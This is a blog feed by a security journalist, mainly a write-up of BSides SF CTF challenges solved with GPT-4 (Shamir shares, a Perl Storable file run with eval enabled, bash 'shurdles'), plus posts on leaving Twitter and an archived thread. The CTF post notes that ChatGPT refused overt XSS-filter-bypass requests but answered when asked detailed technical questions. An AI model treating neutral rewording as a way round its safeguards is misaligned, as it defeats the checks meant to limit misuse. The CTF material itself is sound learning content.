<p>And in the meantime, keep an eye out for part 2 of this post, where I will hopefully <em>actually finish the release</em>. I plan on documenting the rest of the process, including how to make polished, code-signed Windows and macOS packages, update the onionshare.org website and the documentation, publish the Homebrew package, and so on.</p>
<h1 id="elon-banned-me-from-twitter-for-doing-journalism-good-riddance">Elon banned me from Twitter for doing journalism. Good riddance.</h1><p><em>By Micah Lee, posted: 2023-05-04</em></p>
<p>It's been nearly six months since Elon Musk threw one of his first tantrums as the King of Twitter and <a href="https://theintercept.com/2022/12/16/elon-musk-twitter-suspended-journalists/">banned me</a> (along with a bunch of other journalists) for tweeting about him censoring Mastodon. A few days later he "reinstated" my account but I was still <a href="https://theintercept.com/2022/12/20/elon-musk-twitter-banned-journalists/">locked out</a> until I agreed to delete my forbidden tweet that the billionaire didn't like. And I've been locked out ever since.</p>
<p><iframe src="https://infosec.exchange/@micahflee/109532940044165999/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe><script src="https://assets.infosec.exchange/embed.js" async="async"></script></p>
<p>Honestly, I highly recommend getting banned from Twitter. My quality of life has definitely improved without it.</p>
<p>Since Elon took over, Twitter has been in a steep decline that it will obviously never recover from. From what I hear, there are more fascists, more hate speech, way more anti-trans BS, more scams, way more annoying advertisements, and the place is swarming with Elon fanboys with blue checkmarks who are impossible to avoid. It just sounds gross.</p>
<p>We don't need it anymore. There are actual alternatives now: You can find me on Mastodon as <a href="https://infosec.exchange/@micahflee">@micahflee@infosec.exchange</a> and on Bluesky as <a href="https://staging.bsky.app/profile/micahflee.com">@micahflee.com</a>.</p>
<p>I decided that it's about time that I <em>actually</em> pull the plug on Twitter for good. Today I logged in and deleted the forbidden tweet so I could use my account again. And then I used it to close my DMs, mark my account as protected, delete all of my other tweets, and update my bio one last time. Good riddance.</p>
<p>The thing that prevented me from doing this many months ago is that over the years I've posted so many Twitter threads, including many that people referenced all over the internet, and I didn't want my content to die.</p>
<p>But fuck it, I also don't want my content on the steaming garbage salad that is post-Elon Twitter. So, before deleting everything, I archived some of the Twitter threads that I thought were worth keeping here to my blog. Here they are:</p>
<ul>
<li>2022-12-02 <a href="../../../2022/12/twitter-thread-response-to-matt-taibbis-first-twitter-files-tweets/">Response to Matt Taibbi's first Twitter Files Tweets</a></li>
<li>2022-04-19 <a href="../../../2022/04/twitter-thread-for-first-time-in-internet-history-russia-is-fair-game-for-cyber-attacks-and-this-is-what-it-looks-like/">For first time in internet history Russia is fair game for cyber attacks, and this is what it looks like</a></li>
<li>2022-02-15 <a href="../../../2022/02/twitter-thread-freedom-convoy-and-the-givesendgo-hacks/">"Freedom Convoy" and the GiveSendGo hacks</a></li>
<li>2021-09-28 <a href="../../../2021/09/twitter-thread-healthcare-network-led-by-simone-gold-and-americas-frontline-doctors-making-millions-off-hydroxychloroquine-and-ivermectin/">Healthcare network led by Simone Gold and America's Frontline Doctors making millions off hydroxychloroquine and ivermectin</a></li>
<li>2021-09-24 <a href="../../../2021/09/twitter-thread-epiks-utter-lack-of-security-and-terrible-decisions-boggle-my-mind/">Epik's utter lack of security & terrible decisions boggle my mind</a></li>
<li>2021-08-05 <a href="../../../2021/08/twitter-thread-327gb-of-membership-donation-and-petition-signature-records-from-the-tea-party-patriots/">327GB of membership, donation, and petition signature records from the Tea Party Patriots</a></li>
<li>2021-05-13 <a href="../../../2021/05/twitter-thread-glenn-greenwald-supporting-the-american-fascist-movement-dressed-up-as-media-criticism/">Glenn Greenwald supporting the American fascist movement dressed up as "media criticism"</a></li>
<li>2021-05-04 <a href="../../../2021/05/twitter-thread-glenn-greenwald-related-social-engineeringdeath-threats/">Glenn Greenwald-related social engineering/death threats</a></li>
<li>2020-08-17 <a href="../../../2020/08/twitter-thread-northern-california-regional-intelligence-center/">Northern California Regional Intelligence Center</a></li>
<li>2020-07-15 <a href="../../../2020/07/twitter-thread-the-blueleaks-hack-of-251-law-enforcement-websites-exposes-personal-data-of-over-700000-cops/">The BlueLeaks hack of 251 law enforcement websites exposes personal data of over 700,000 cops</a></li>
<li>2020-05-26 <a href="../../../2020/05/twitter-thread-live-tweeting-zooms-e2ee-whitepaper/">Live-tweeting Zoom's E2EE whitepaper</a></li>
</ul>
<p>Now that I've deleted everything from Twitter, here's what my account looks like:</p>
<p><img src="twitter-profile.png" alt=""></p>
<p>Adios, Twitter. Life is better without you.</p>
<h1 id="capturing-the-flag-with-gpt-4">Capturing the Flag with GPT-4</h1><p><em>By Micah Lee, posted: 2023-04-23</em></p>
<p>This weekend I went to BSides SF 2023 and had a blast. I went to some really interesting talks (including an <a href="https://bsidessf2023.sched.com/event/1Hztz/sleeping-with-one-ai-open-an-introduction-to-attacks-against-artificial-intelligence-and-machine-learning">excellent one</a> about adversarial machine learning), but mostly I spent my time solving CTF hacking challenges. And this time, I did it with the help of GPT-4, the latest generation of OpenAI's ChatGPT generative language model. GPT-4 straight up solved some challenges for me, which blew my mind. There were definitely several flags I got that I wouldn't have gotten without the help of GPT-4. For challenges that GPT-4 didn't solve on its own, it provided incredibly helpful tips, or quickly wrote scripts that would have been tedious or time-consuming for me to write myself. Good thing there's (almost) no such thing as cheating in CTF!</p>
<p>I also found several situations where ChatGPT simply errored out and refused to give me answers. I think this was the case when it was overtly clear that I was trying to get help with hacking. For example, when I asked it how to write some JavaScript code that would bypass a specific XSS filter, and used language that made it clear that I was trying to bypass an XSS filter, it just failed with an error. It seems that ChatGPT has some nominal safeguards to prevent people from using it for malicious hacking, but if you simply ask detailed technical questions (which could be used for offense or defense), it tends to answer them.</p>
<p>All that said, I wanted to share my experience with a few challenges. This post includes write-ups for:</p>
<ul>
<li>Shamir Secret Sharing</li>
<li>perckel</li>
<li>Shell Hurdles</li>
</ul>
<p>I used GPT-4 for help on several other challenges, but these three especially impressed me. I also solved several challenges without its help--partially because it's not always easy to give it all the context it needs to answer a question. You can't, for example, send it a 30MB APK file and then ask for help reverse engineering it, or copy all of the source code for a web app into GPT-4 and ask it to find the vulnerabilities. You can get help with smaller chunks of these problems, but I could see this technology getting way more powerful in the future.</p>
<h2 id="shamir-secret-sharing">Shamir Secret Sharing</h2><p><img src="sss-challenge.png" alt=""></p>
<p>In this challenge, I had to walk around the BSides SF venue looking for QR codes to scan. In <a href="https://en.wikipedia.org/wiki/Shamir%27s_Secret_Sharing">Shamir's Secret Sharing scheme</a>, a secret is split into a number of parts, and anyone who holds at least a threshold number of those parts can reconstruct the secret. In this case, there were 7 parts with a threshold of 5, and I wandered around and found 6 of them on QR codes. I then simply asked GPT-4 to solve the problem for me:</p>
<blockquote><p>Here are parts for Shamir Secret Sharing:</p>
<p>Share 1 of 7 (min 5): (x1, y1) = (1, 12214173319090360239218007) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>Share 3 of 7 (min 5): (x3, y3) = (3, 272214528378786743506941922) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>Share 4 of 7 (min 5): (x4, y4) = (4, 404905998942651879217397287) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>Share 5 of 7 (min 5): (x5, y5) = (5, 589183787842889173793388269) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>Share 6 of 7 (min 5): (x6, y6) = (6, 338337360147368973687481536) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>Share 7 of 7 (min 5): (x7, y7) = (7, 479528534189573769684386994) Field prime = 2^89 - 1 Flag = CTF{secretasletters} Secret -> base 27 a = 1, b = 2, ... z = 26 (base 27)</p>
<p>How do I decrypt the secret?</p>
</blockquote>
<p>And GPT-4 delivered.</p>
<p><img src="chatgpt-sss.png" alt=""></p>
<p>Wow. Does it work? I copied the Python script into <code>decrypt.py</code> and tried running it.</p>
<pre><code>$ python3 decrypt.py
CTF{perasperaadastra}
</code></pre>
<p>Holy shit. Mind blown. Especially because this challenge actually includes a very tricky part related to base-27, but GPT-4 just solved it all on the first try, without additional prompting.</p>
<p>I submitted the flag and got the points.</p>
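<p>For the curious, the reconstruction boils down to Lagrange interpolation at x = 0 over the prime field, followed by base-27 decoding. Here's a sketch of that math (not the exact script GPT-4 generated; the shares are the ones from the QR codes above, and five of them meet the threshold):</p>

```python
# Sketch: Lagrange interpolation at x = 0 over GF(p), then base-27 decoding
# (a=1 .. z=26). Not the exact script GPT-4 wrote; shares are from the post.
p = 2**89 - 1

shares = [
    (1, 12214173319090360239218007),
    (3, 272214528378786743506941922),
    (4, 404905998942651879217397287),
    (5, 589183787842889173793388269),
    (6, 338337360147368973687481536),
]

def reconstruct(points, prime):
    # Evaluate the unique polynomial through the points at x = 0.
    secret = 0
    for i, (xi, yi) in enumerate(points):
        num, den = 1, 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = num * -xj % prime
                den = den * (xi - xj) % prime
        secret = (secret + yi * num * pow(den, -1, prime)) % prime
    return secret

def base27_decode(n):
    # Read the integer as base-27 digits, a=1 .. z=26.
    out = ""
    while n:
        n, digit = divmod(n, 27)
        out = chr(ord("a") + digit - 1) + out
    return out

print("CTF{" + base27_decode(reconstruct(shares, p)) + "}")
```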
<h2 id="perckel">perckel</h2><p><img src="perckel-challenge.png" alt=""></p>
<p>I downloaded the file <code>flag.bin</code>, and then tried to figure out what this file is by running <code>file</code> on it.</p>
<pre><code>$ file flag.bin
flag.bin: perl Storable (v0.7) data (network-ordered) (major 2) (minor 11)
</code></pre>
<p>I had no idea what this was, and it's been well over a decade since I wrote any code in Perl, so I asked GPT-4.</p>
<blockquote><p>What is this file?</p>
<p>flag.bin: perl Storable (v0.7) data (network-ordered) (major 2) (minor 11)</p>
</blockquote>
<p><img src="chatgpt-perckel1.png" alt=""></p>
<p>Huh, cool. Maybe GPT-4 can write a Perl script for me so I can see what's in that file.</p>
<blockquote><p>Write a Perl script that will display what's in that file</p>
</blockquote>
<p><img src="chatgpt-perckel2.png" alt=""></p>
<p>Nice, I don't have to re-teach myself Perl. I saved the script as <code>script.pl</code> and tried running it:</p>
<pre><code>$ perl script.pl
Can't eval, please set $Storable::Eval to a true value at /System/Library/Perl/5.30/darwin-thread-multi-2level/Storable.pm line 421, at script.pl line 9.
</code></pre>
<p>Hmm, it wants to be able to execute arbitrary code. I'll have to be careful when running this on my computer, but in the meantime let's see if GPT-4 can help fix this issue.</p>
<blockquote><p>Can't eval, please set $Storable::Eval to a true value at /System/Library/Perl/5.30/darwin-thread-multi-2level/Storable.pm line 421, at script.pl line 9.</p>
</blockquote>
<p><img src="chatgpt-perckel3.png" alt=""></p>
<p>Nice, it fixed the script. I updated <code>script.pl</code>, but I didn't want to run it directly on my computer though. (It was nice of GPT-4 to warn me three separate times about the security risks.) So I decided to run it in a Docker container. I created a new Ubuntu container, installed the correct Perl dependencies, and ran it:</p>
<pre><code>root@22b72f43fc3d:/src# perl ./script.pl
Name "Storable::Eval" used only once: possible typo at ./script.pl line 9.
$VAR1 = {
'shqa' => 'iryaeuxfc',
'jwjepylpxecq' => 'yfebe',
--snip--
'iruvqhgdnfstz' => 'smkohnqw',
'qcotpliscszql' => 'efzhu',
'decode_flag' => sub { "DUMMY" },
'htxj' => 'pmifolpyh',
'lftq' => 'pxqqgeqy',
'adbsjrhouqhgg' => 'srndfdboqqmfc',
'avarqfgzrufc' => 'thgzdhdstum',
'pdeqoerfqxbro' => 'grugrmrocnekt',
'ujlw' => 'ooxnyiyu',
'flag' => '��;���@��(�P��@HTX�Т�@��ڂ���@(!k�8�@��Q�
��@�,��}F�@0Z��W�@��R�J�@���JM��@�#*,�@��E~���@�A����@���Y]��@�v���@@�N
b�@���co6�@������@��
�9�D�|�
�@�\'Mi�e�@i��^9�@',
'lquykkphh' => 'bjyrsce',
'ruybrycyo' => 'othebxvqngu',
--snip--
'zxyybaaawc' => 'kbzr',
'pojhbzugch' => 'dqxiybapwepfh'
};
root@22b72f43fc3d:/src#
</code></pre>
<p>The script spewed out over 1,000 lines of output, displaying the value of this Perl object. Most of the key-value pairs seemed to be garbage, but two of the keys were interesting: <code>flag</code> was a block of binary data, and <code>decode_flag</code> was apparently a Perl function. It sounds like maybe the flag is encoded, and I can call <code>decode_flag</code> to decode it.</p>
<blockquote><p>The $data object has two interesting keys, <code>flag</code> which is binary data, and <code>decode_flag</code> which is a function. Update the script to call the <code>decode_flag</code> function and pass in the value of <code>flag</code></p>
</blockquote>
<p><img src="chatgpt-perckel4.png" alt=""></p>
<p>I updated my script and ran it again:</p>
<pre><code>root@22b72f43fc3d:/src# perl script.pl
Name "Storable::Eval" used only once: possible typo at script.pl line 9.
Decoded flag: CTF{ooohhh_purrrrl_<3}
</code></pre>
<h2 id="shell-hurdles">Shell Hurdles</h2><p><img src="shurdles-challenge.png" alt=""></p>
<p>The challenge provided a link to a web terminal, or a host that I can netcat into to get a shell. Here's what the web terminal looked like:</p>
<p><img src="shurdles-shell1.png" alt=""></p>
<p>Here's the output of a few commands (the hostname is edited for clarity):</p>
<pre><code>ctf@shurdles:~$ ls -l
total 2220
-r-x--x--x 1 root ctf 2270141 Apr 16 2020 shurdles
</code></pre>
<p>My home folder has an executable file called <code>shurdles</code> in it. I tried running it.</p>
<pre><code>ctf@shurdles:~$ ./shurdles
shurdle 0 failed: expected at least 1 argument
</code></pre>
<p>It failed with an error message saying it needs at least 1 argument. This was the first shurdle (shell hurdle), but it's an easy fix--I'll just pass in an argument.</p>
<pre><code>ctf@shurdles:~$ ./shurdles ASDF
shurdle 2 failed: I expected to be called /shurdles, not ./shurdles
</code></pre>
<p>This worked, and I moved on to the next shurdle. This one was pretty hard. This program wants me to run <code>/shurdles</code>, not <code>./shurdles</code>. How can I do that? Let's ask GPT-4. I asked this:</p>
<blockquote><p>I have a bash shell. There is an executable file called /home/ctf/shurdles. I can run it by running:</p>
<p>/home/ctf/shurdles</p>
<p>Or by changing to the folder /home/ctf, and running:</p>
<p>./shurdles</p>
<p>Is it possible for me to run it with this command though, without creating a symlink?</p>
<p>/shurdles</p>
</blockquote>
<p>It responded with a decent idea: add <code>/home/ctf</code> to my PATH so I can just run <code>shurdles</code>, though it wasn't perfect.</p>
<p><img src="chatgpt1.png" alt=""></p>
<p>I tried it anyway, and it didn't work:</p>
<pre><code>ctf@shurdles:~$ export PATH=$PATH:/home/ctf
ctf@shurdles:~$ shurdles ASDF
shurdle 2 failed: I expected to be called /shurdles, not shurdles
</code></pre>
<p>So I went back to GPT-4 and pleaded for additional help.</p>
<blockquote><p>That works to run:</p>
<p>shurdles</p>
<p>But how can I run it with:</p>
<p>/shurdles</p>
</blockquote>
<p>It told me in that case to create a symlink, though that requires root.</p>
<p><img src="chatgpt2.png" alt=""></p>
<p>I don't have root, so I asked for other ideas.</p>
<blockquote><p>Is there any way to do this without using symlinks, and without using root?</p>
</blockquote>
<p>It then came up with a great idea that I might not have thought up on my own: use a shell function.</p>
<p><img src="chatgpt3.png" alt=""></p>
<p>Unfortunately, this didn't work:</p>
<pre><code>ctf@shurdles:~$ function /shurdles() { /home/ctf/shurdles "$@"; }
ctf@shurdles:~$ /shurdles ASDF
shurdle 2 failed: I expected to be called /shurdles, not /home/ctf/shurdles
</code></pre>
<p>It seems that even though I'm typing <code>/shurdles</code>, that's a shell function that runs <code>/home/ctf/shurdles</code>, so that path is the first argument (argv[0]) the process sees. I asked for more help:</p>
<blockquote><p>That was a great idea, but I actually need the first value of argv to be /shurdles, and that makes the first value /home/ctf/shurdles</p>
</blockquote>
<p>It responded with an idea that I totally wouldn't have thought of, because I had never even heard of <code>exec -a</code>. Fascinating.</p>
<p><img src="chatgpt4.png" alt=""></p>
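<p>(As an aside, the same argv[0] decoupling that <code>exec -a</code> does is available elsewhere too. For example, Python's <code>subprocess</code> takes an <code>executable</code> argument naming the binary to run, while <code>args[0]</code> becomes the argv[0] the child sees. A quick sketch, assuming a Unix-like system, using <code>/bin/sh</code> to print its own $0:)</p>

```python
# The argv[0] trick behind `exec -a`, from Python: subprocess's `executable`
# names the binary to run, while args[0] becomes the argv[0] the child sees.
# Demonstrated with /bin/sh printing its own $0 (assumes a Unix-like system).
import subprocess

out = subprocess.run(
    ["/shurdles"],         # argv the child sees: argv[0] = "/shurdles"
    executable="/bin/sh",  # binary actually executed
    input="echo $0\n",
    capture_output=True,
    text=True,
)
print(out.stdout.strip())  # -> /shurdles
```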
<p>I decided to give it a try, but I realized the box I was on didn't have vim or nano. So, out of laziness, I just asked for the commands to save <code>shurdles_wrapper.sh</code> using echo instead.</p>
<blockquote><p>How can I create that shurdles_wrapper.sh script using echo, instead of a text editor?</p>
</blockquote>
<p>It gave me the exact command to run.</p>
<p><img src="chatgpt5.png" alt=""></p>
<p>I changed it a bit myself--I stored the script in <code>/tmp/wrapper.sh</code> instead of <code>/home/ctf/shurdles_wrapper.sh</code>, because I didn't have write access to <code>/home/ctf</code>, but it worked:</p>
<pre><code>ctf@shurdles:~$ echo -e '#!/bin/bash\nexec -a /shurdles /home/ctf/shurdles "$@"' > /tmp/wrapper.sh
ctf@shurdles:~$ chmod +x /tmp/wrapper.sh
ctf@shurdles:~$ /tmp/wrapper.sh ASDF
shurdle 3 failed: I expected the environment variable "HACKERS" to look like hack the planet on separate lines
</code></pre>
<p>Got past that shurdle! And onto the next. I could totally figure this one out, but why not save time and get GPT-4 to do it for me?</p>
<blockquote><p>How can I set the environment variable "HACKERS" to be "hack the planet", but with each word on a separate line?</p>
</blockquote>
<p><img src="chatgpt6.png" alt=""></p>
<p>And it worked:</p>
<pre><code>ctf@shurdles:~$ export HACKERS=$'hack\nthe\nplanet'
ctf@shurdles:~$ /tmp/wrapper.sh ASDF
shurdle 5 failed: expected workdir "/run/. -- !!"
</code></pre>
<p>Onto the next shurdle. This one confused me a bit. I asked GPT-4 how I could make my current working directory look like: <code>/run/. -- !!</code>, without actually creating that folder and changing to it. It had some good ideas, including running <code>export PWD='/run/. -- !!'</code> before running the command, but it didn't work. I asked it the different ways a command can learn its working directory, and it told me it can use the <code>PWD</code> environment variable, but also the <code>getcwd</code> function. When I asked how <code>getcwd</code> learned the working directory without the <code>PWD</code> environment variable, it gave me a detailed answer.</p>
<p><img src="chatgpt7.png" alt=""></p>
<p>All of this is nitty-gritty Linux detail that I didn't know beforehand. And sure, generative language models confidently say things that are false sometimes, so it might not be exactly right... but honestly, it seems about as likely to be right as if I had asked a human Linux nerd. They get things wrong sometimes too.</p>
<p>In the end though, I was barking up the wrong tree. I realized the <code>ctf</code> user had write permission to <code>/run</code>, so I could just create the folder and change to it. So I got past this shurdle on my own.</p>
<pre><code>ctf@shurdles:~$ mkdir '/run/. -- !!'
ctf@shurdles:~$ cd /run/.\ --\ \!\!/
ctf@shurdles:/run/. -- !!$ /tmp/wrapper.sh ASDF
shurdle 6 failed: fd 3 isn't open
</code></pre>
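<p>Escaping that pathname by hand is error-prone; as a side note (not something the challenge required), Python's <code>shlex.quote</code> will produce a safely quoted form of a hostile path like this one:</p>

```python
# Side note: shlex.quote produces a safely escaped form of a hostile
# pathname like this one, instead of hand-escaping spaces and bangs.
import shlex

print("mkdir " + shlex.quote("/run/. -- !!"))  # -> mkdir '/run/. -- !!'
```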
<p>I didn't quite know what this one meant. Did I have to open a file or something? I asked GPT-4.</p>
<blockquote><p>What does "fd 3 isn't open" mean?</p>
</blockquote>
<p><img src="chatgpt8.png" alt=""></p>
<p>Interesting. So the program I'm running needs to open a file, and that will be file descriptor 3... I still had no idea how to make the program open a new file. I tried passing in a valid filename like <code>/home/ctf/.bashrc</code> instead of <code>ASDF</code> as the first argument, but no luck. So I asked GPT-4 for more help:</p>
<blockquote><p>Is there any way I could run the program that's giving this error in a way that will make it open an additional resource, so that file descriptor 3 will be open?</p>
</blockquote>
<p><img src="chatgpt9.png" alt=""></p>
<p>I really ought to learn how to use the <code>exec</code> command... I had no idea about any of this, but I decided to try it.</p>
<pre><code>ctf@shurdles:/run/. -- !!$ exec 3>/tmp/fd3_output.txt
ctf@shurdles:/run/. -- !!$ /tmp/wrapper.sh ASDF
shurdle 6 failed: expected fd 3 to be a file of 1337 bytes in length
</code></pre>
<p>Progress! So I need <code>/tmp/fd3_output.txt</code> to be 1337 bytes long. I knew how to do this, but thought it would be faster to ask GPT-4 than to look up the specific <code>dd</code> arguments, or write Python code, or however I wanted to do it.</p>
<blockquote><p>How can I make /tmp/fd3_output.txt be 1337 bytes long?</p>
</blockquote>
<p><img src="chatgpt10.png" alt=""></p>
<p>When I ran the <code>dd</code> command, it made <code>/tmp/fd3_output.txt</code> 1337 bytes long. However, when I then ran <code>exec 3>/tmp/fd3_output.txt</code>, it truncated the file to zero bytes. Hmm, how could I solve that?</p>
<blockquote><p>How can I modify the command:</p>
<p>exec 3>/tmp/fd3_output.txt</p>
<p>So that when it creates the file /tmp/fd3_output.txt, it makes it 1337 bytes long?</p>
</blockquote>
<p><img src="chatgpt11.png" alt=""></p>
<p>I tried it... but it didn't work.</p>
<pre><code>ctf@shurdles:/run/. -- !!$ dd if=/dev/zero of=/tmp/fd3_output.txt bs=1 count=1337 && exec 3>/tmp/fd3_output.txt
1337+0 records in
1337+0 records out
1337 bytes (1.3 kB, 1.3 KiB) copied, 0.00219604 s, 609 kB/s
ctf@shurdles:/run/. -- !!$ /tmp/wrapper.sh ASDF
shurdle 6 failed: expected fd 3 to be a file of 1337 bytes in length
</code></pre>
<p>I wonder what's going on.</p>
<blockquote><p>When I run:</p>
<p>dd if=/dev/zero of=/tmp/fd3_output.txt bs=1 count=1337 && exec 3>/tmp/fd3_output.txt</p>
<p>It seems that /tmp/fd3_output.txt is still 0 bytes.</p>
<p>$ ls -l /tmp/fd3_output.txt
-rw-r--r-- 1 ctf ctf 0 Apr 23 06:17 /tmp/fd3_output.txt</p>
</blockquote>
<p><img src="chatgpt12.png" alt=""></p>
<p>Let's see...</p>
<pre><code>ctf@shurdles:/run/. -- !!$ dd if=/dev/zero of=/tmp/fd3_output.txt bs=1 count=1337 && exec 3<>/tmp/fd3_output.txt
1337+0 records in
1337+0 records out
1337 bytes (1.3 kB, 1.3 KiB) copied, 0.0021625 s, 618 kB/s
ctf@shurdles:/run/. -- !!$ /tmp/wrapper.sh ASDF
shurdle 7 failed: tz Local != America/Los_Angeles
</code></pre>
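<p>In hindsight the distinction is simple: <code>exec 3>file</code> opens the file for writing and truncates it, while <code>exec 3&lt;>file</code> opens it read-write without truncating. A minimal demonstration (<code>demo.txt</code> is just an example filename):</p>

```shell
dd if=/dev/zero of=demo.txt bs=1 count=1337 2>/dev/null
exec 3> demo.txt          # '>' truncates the file on open
wc -c < demo.txt          # 0
dd if=/dev/zero of=demo.txt bs=1 count=1337 2>/dev/null
exec 3<> demo.txt         # '<>' opens read-write, no truncation
wc -c < demo.txt          # 1337
exec 3>&-                 # close fd 3
```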
<p>One more shurdle down! Okay, so I need to update the time zone next.</p>
<blockquote><p>How do I set the time zone to "America/Los_Angeles" so that the next command I run recognizes that as the time zone?</p>
</blockquote>
<p><img src="chatgpt13.png" alt=""></p>
<pre><code>ctf@shurdles:/run/. -- !!$ exec 3<>/tmp/fd3_output.txt && TZ="America/Los_Angeles" /tmp/wrapper.sh ASDF
shurdle 8 failed: could not find shurdles-helper
</code></pre>
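<p>A detail worth knowing here: prefixing a command with <code>VAR=value</code> sets that environment variable for that single command only, leaving the shell's own environment untouched. A quick sketch:</p>

```shell
# Set TZ only for this one invocation of date:
TZ="America/Los_Angeles" date +%Z   # prints PST or PDT, depending on the season
date +%Z                            # the shell's own time zone is unchanged
```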
<p>Another shurdle down! Now it needs to find <code>shurdles-helper</code>. This one I can solve on my own, by creating a new folder, putting an executable file called <code>shurdles-helper</code> into it, and adding it to the PATH.</p>
<pre><code>ctf@shurdles:/run/. -- !!$ mkdir /tmp/bin
ctf@shurdles:/run/. -- !!$ echo -e '#!/bin/bash\necho helper' > /tmp/bin/shurdles-helper
ctf@shurdles:/run/. -- !!$ chmod +x /tmp/bin/shurdles-helper
ctf@shurdles:/run/. -- !!$ export PATH=/tmp/bin:$PATH
ctf@shurdles:/run/. -- !!$ exec 3<>/tmp/fd3_output.txt && TZ="America/Los_Angeles" /tmp/wrapper.sh ASDF
shurdle 9 failed: expected /home/ctf/.cache/shurdles, does it exist?
</code></pre>
<p>It worked. Onto the next shurdle. In this case, it needs a file called <code>/home/ctf/.cache/shurdles</code> to exist. I think I can solve this one on my own too by creating that file.</p>
<pre><code>ctf@shurdles:/run/. -- !!$ mkdir -p /home/ctf/.cache
ctf@shurdles:/run/. -- !!$ touch /home/ctf/.cache/shurdles
ctf@shurdles:/run/. -- !!$ exec 3<>/tmp/fd3_output.txt && TZ="America/Los_Angeles" /tmp/wrapper.sh ASDF
shurdle 9 failed: /home/ctf/.cache/shurdles was modified in the last day, sorry
</code></pre>
<p>That worked too, but now the file can't have been modified in the last day. How do you update the modified timestamp on a file? GPT-4 will know.</p>
<blockquote><p>How do you update the modified timestamp on a file?</p>
</blockquote>
<p><img src="chatgpt14.png" alt=""></p>
<p>Okay, simple enough. I'll set it to a month ago.</p>
<pre><code>ctf@shurdles:/run/. -- !!$ touch -t 202303231430 /home/ctf/.cache/shurdles
ctf@shurdles:/run/. -- !!$ exec 3<>/tmp/fd3_output.txt && TZ="America/Los_Angeles" /tmp/wrapper.sh ASDF
Congratulations!!!
CTF{you_made_it_past_the_hurdles}
</code></pre>
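<p>For reference, <code>touch -t</code> takes a <code>[[CC]YY]MMDDhhmm[.ss]</code> timestamp, and GNU <code>date -r</code> reads a file's modification time back, so you can confirm the change (a sketch; <code>demo_file</code> is just an example filename, and GNU coreutils is assumed):</p>

```shell
touch -t 202303231430 demo_file       # set mtime to 2023-03-23 14:30 local time
date -r demo_file +%Y%m%d%H%M         # prints 202303231430
```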
<p>I only made it past the hurdles thanks to you, GPT-4.</p>
Twitter Thread: Response to Matt Taibbi's first Twitter Files Tweets2022-12-02T00:00:00ZMicah Leeurn:uuid:a5d56aa4-cf53-3d46-a458-972575e3fc99<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1598831445048721408">https://twitter.com/micahflee/status/1598831445048721408</a></p>
<hr>
<p>[This Tweet was deleted by the Tweet author.]</p>
<hr>
<p>There aren't archives of all of the tweets available but these are mostly nude photos that were posted without consent</p>
<p><img src="image1.jpg" alt=""></p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">9. Celebrities and unknowns alike could be removed or reviewed at the behest of a political party: <a href="https://t.co/4uzkHnQ65E">pic.twitter.com/4uzkHnQ65E</a></p>— Matt Taibbi (@mtaibbi) <a href="https://twitter.com/mtaibbi/status/1598828601268469760?ref_src=twsrc%5Etfw">December 2, 2022</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 4:08 PM · Dec 2, 2022, 128 Retweets, 769 Likes</em></p>
<hr>
<p>Fun fact: Twitter censors links to <a href="https://ddosecrets[.]com">https://ddosecrets[.]com</a> in the same way for publishing police misconduct docs during 2020 BLM protests. The @nypost story was suppressed for 2 DAYS, @DDoSecrets has been censored for OVER 2 YEARS <a href="https://theintercept.com/2022/11/22/elon-musk-twitter-censor-ddosecrets/">https://theintercept.com/2022/11/22/elon-musk-twitter-censor-ddosecrets/</a></p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">18. Twitter took extraordinary steps to suppress the story, removing links and posting warnings that it may be “unsafe.” They even blocked its transmission via direct message, a tool hitherto reserved for extreme cases, e.g. child pornography.</p>— Matt Taibbi (@mtaibbi) <a href="https://twitter.com/mtaibbi/status/1598831435288563712?ref_src=twsrc%5Etfw">December 3, 2022</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 4:15 PM · Dec 2, 2022, 370 Retweets, 1,482 Likes</em></p>
<hr>
<p>What's @elonmusk's excuse for banning antifascist accounts last week? Oh yeah, he took requests on who to ban directly from @MrAndyNgo in a twitter thread, and then banned them even though they didn't violate any rules <a href="https://theintercept.com/2022/11/29/elon-musk-twitter-andy-ngo-antifascist/">https://theintercept.com/2022/11/29/elon-musk-twitter-andy-ngo-antifascist/</a></p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">24. “They just freelanced it,” is how one former employee characterized the decision. “Hacking was the excuse, but within a few hours, pretty much everyone realized that wasn’t going to hold. But no one had the guts to reverse it.”</p>— Matt Taibbi (@mtaibbi) <a href="https://twitter.com/mtaibbi/status/1598834373482070016?ref_src=twsrc%5Etfw">December 3, 2022</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 4:25 PM · Dec 2, 2022, 286 Retweets, 1,380 Likes</em></p>
<hr>
<p>And just as an aside, OF COURSE twitter shouldn't have censored the link to the @nypost story about Hunter Biden. It was bad, but not nearly as bad as twitter's ongoing censorship of @ddosecrets to this day, which @elonmusk refuses to acknowledge <a href="https://theintercept.com/2022/11/22/elon-musk-twitter-censor-ddosecrets/">https://theintercept.com/2022/11/22/elon-musk-twitter-censor-ddosecrets/</a></p>
<p><em>Posted 4:30 PM · Dec 2, 2022, 100 Retweets, 643 Likes</em></p>
<hr>
<p>I just deleted the first tweet in this thread because it accidentally contained revenge porn. It said:</p>
<p>That first tweet contained nude images of Hunter Biden and a woman without their consent... that should have stayed up?</p>
<p><img src="image2.jpg" alt=""></p>
